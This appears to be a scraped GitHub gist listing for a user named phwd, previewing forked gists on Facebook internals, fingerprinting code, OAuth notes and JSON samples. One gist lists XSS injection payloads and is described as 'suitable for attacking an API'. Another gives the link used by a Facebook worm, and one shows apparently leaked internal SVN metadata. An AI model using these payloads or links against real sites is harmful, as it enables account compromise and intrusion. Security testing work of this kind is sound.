Chrome ExtensionのLive HTTP Headersを調査した。Firefox用のものではない。Firefox用のものではない。
11/7追記
- 類似 or 同様の方法で難読化scriptを埋め込んでいる拡張機能が大量にあったため、Googleに報告済み。
- https://twitter.com/bulkneets/status/795260268221636608
Summary in english.
phwd
/ Mysterious Facebook Code
Created
August 14, 2016 07:20
— forked from rainiera/Mysterious Facebook Code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var org_str = "j8ck72di"; | |
| var session_str = "4734a9fc27f7fee1aa58f66046af6c49"; | |
| var base_str = "https://ct-m-fbx.fbsbx.com/fp"; | |
| var page_id = "1"; | |
| var ip_addr_str = "820139e7306525d7"; | |
| var tarpitting_param = ""; | |
| var carrier_id_enabled = "false"; | |
| var flash_tags = "true"; |
phwd
/ 666_lines_of_XSS_vectors.html
Created
July 27, 2016 17:30
— forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Digging into a Facebook Worm | |
| http://i.imgur.com/zc2A8vJ.png | |
| Facebook worms are interesting | |
| The following was a link that was shared to me (You probably shouldn't click it) | |
| https://www.facebook.com/l.php?u=https%3A%2F%2Fcdn.fbsbx.com%2Fhphotos-xpa1%2Fv%2Ft59.2708-21%2F12447002_1746605272238633_1642381431_n.html%2FV1DE0-9682.html%3Foh%3D8a665fb34c8793a92fd02cceb31d4b01%26oe%3D5718116B%26dl%3D1&h=cAQHPcYE7 |
phwd
/ LICENSE.txt
Created
April 6, 2016 13:08
— forked from dfreedm/LICENSE.txt
Facebook Profile Finder in 139 bytes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE | |
| Version 2, December 2004 | |
| Copyright (C) 2011 YOUR_NAME_HERE <YOUR_URL_HERE> | |
| Everyone is permitted to copy and distribute verbatim or modified | |
| copies of this license document, and changing it is allowed as long | |
| as the name is changed. | |
| DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE |
phwd
/ gist:e74c3304b566d1717b72eaaf2aed3336
Created
April 6, 2016 13:06
— forked from jaredhirsch/gist:4dcd73653dd5f9a4dacc
oauth 2, some notes
I did a bit of initial OAuth research this week for FxA (Firefox Accounts). It was interrupted by more pressing stuff (bugs bugs bugs), but thought I'd post my incomplete work-in-progress notes for whenever I get back to this.
Notes come from Getting Started with OAuth 2.0, which I accessed via Safari.
- look carefully at a number of JS SDKs
- think in terms of a generic OAuth abstraction for FxOS
- but begin by building the simplest possible solution for FxA on FxOS
- we really need implicit grant,
- and a proxy server that could handle redirects on behalf of serverless apps,
phwd
/ Facebook leakage
Created
January 6, 2016 15:20
— forked from james/Facebook leakage
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 9 dir 117150 svn+ssh://tubbs/svnroot/tfb/releases/thefacebook-r116496-fb95/www/lib/display/privacy svn+ssh://tubbs/svnroot 2008-08-05T21:47:04.536211Z 114218 chad svn:special svn:externals svn:needs-lock 2c7ba8d8-a2f7-0310-a573-de162e16dcc7 pages.php file 2008-08-18T18:50:32.000000Z e69ad78841111ae71df858b23a4d356c 2008-08-05T21:47:04.536211Z 114218 chad 8328 ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� |
phwd
/ gist:f1990aeff9d17152b3f6
Last active
January 6, 2016 14:58
— forked from grigs/gist:e4ea58be46134cdb0729
Facebook Instant Article JSON Buzzfeed Example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "700554543387711": { | |
| "id": "700554543387711", | |
| "latest_version": { | |
| "id": "455210147987840", | |
| "article_canonical_url": "http:\/\/www.buzzfeed.com\/expresident\/steps-to-instantly-improve-your-day", | |
| "article_version_number": 2, | |
| "cover_media": { | |
| "__type__": { | |
| "name": "DocumentVideoElement" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "pages-named(Facebook Security)": { | |
| "url": "https://www.facebook.com/search/str/Facebook%2BSecurity/pages-named", | |
| "results": { | |
| "count": 177, | |
| "nodes": [ | |
| { | |
| "id": "31987371885", | |
| "url": "https://www.facebook.com/security", | |
| "name": "Facebook Security", |
phwd
/ app.rb
Last active
August 29, 2015 14:23
— forked from will3942/app.rb
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'openssl' | |
| require 'base64' | |
| require 'json' | |
| require 'httpclient' | |
| http = HTTPClient.new(:agent_name => useragent) | |
| key = "" #The Private key | |
| login_info = {:guid => "00000000-0000-0000-0000-000000000000", | |
| :password => "PASSWORD", | |
| :username => "USERNAME", |